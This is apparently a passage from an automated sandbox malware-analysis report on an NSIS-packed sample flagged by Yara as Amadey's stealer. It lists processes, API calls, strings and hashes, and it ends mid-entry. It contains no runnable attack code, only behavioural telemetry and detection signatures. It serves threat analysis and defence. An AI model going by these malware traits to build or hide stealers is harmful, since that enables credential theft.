Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000000.2552580820.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:46:00
Start date:	14/04/2024
Path:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Imagebase:	0xa50000
File size:	437'248 bytes
MD5 hash:	5A14BA286D692A6D65DBCF7340EA1C8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.2745389510.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.2755905464.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.6%
Total number of Nodes:	1337
Total number of Limit Nodes:	18

Executed Functions

Function 0040352D Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
ExitProcess.KERNEL32(?), ref: 00403A59
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

UXTHEME, xrefs: 0040361B, 00403620, 00403626
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
~nsu, xrefs: 0040394E
NSIS Error, xrefs: 0040368E
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
\Temp, xrefs: 00403820
TEMP, xrefs: 0040384E
Low, xrefs: 0040383C
1033, xrefs: 0040386A
TMP, xrefs: 00403856
Error launching installer, xrefs: 004038FF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00403928
.tmp, xrefs: 0040396A
SeShutdownPrivilege, xrefs: 00403AA1

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-2960561200
Opcode ID: 7e677dcc8aa1a2860e590d08fdc46499932abedd2014293e2a7c9a670f87a25b
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 7e677dcc8aa1a2860e590d08fdc46499932abedd2014293e2a7c9a670f87a25b
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 00403CED
lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(00432EA0,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54
RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

1033, xrefs: 00403C0C, 00403C68
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
RichEd32, xrefs: 00403E28
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
_Nb, xrefs: 00403D70, 00403DD8
RichEdit20W, xrefs: 00403E38, 00403E3E
.DEFAULT\Control Panel\International, xrefs: 00403C58
RichEd20, xrefs: 00403E1A
RichEdit, xrefs: 00403E47
.exe, xrefs: 00403CFA

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-236412282
Opcode ID: d676aef2f71fbad829aa91df8609c37157257c620a924ef9afc500929f8c8bb5
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: d676aef2f71fbad829aa91df8609c37157257c620a924ef9afc500929f8c8bb5
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

Null, xrefs: 00403174
}8@, xrefs: 00403227, 00403242
Error launching installer, xrefs: 004030CD
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
soft, xrefs: 0040316B
Inst, xrefs: 00403162
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-138144483
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

}8@, xrefs: 004032B4
A, xrefs: 00403374
*B, xrefs: 004032DF
,(B, xrefs: 0040338B, 0040339D
... %d%%, xrefs: 004033FB
A, xrefs: 0040347E

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$,(B$... %d%%$}8@
API String ID: 551687249-3641650128
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(00432EA0,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,00423380,74DF23A0), ref: 004066A8
lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-730719616
Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00423380,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00423380,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040179E
open, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
open C:\Windows\system32\cmd, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open C:\Windows\system32\cmd
API String ID: 1941528284-3192510501
Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

%s%S.dll, xrefs: 004068E6
UXTHEME, xrefs: 004068A3
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

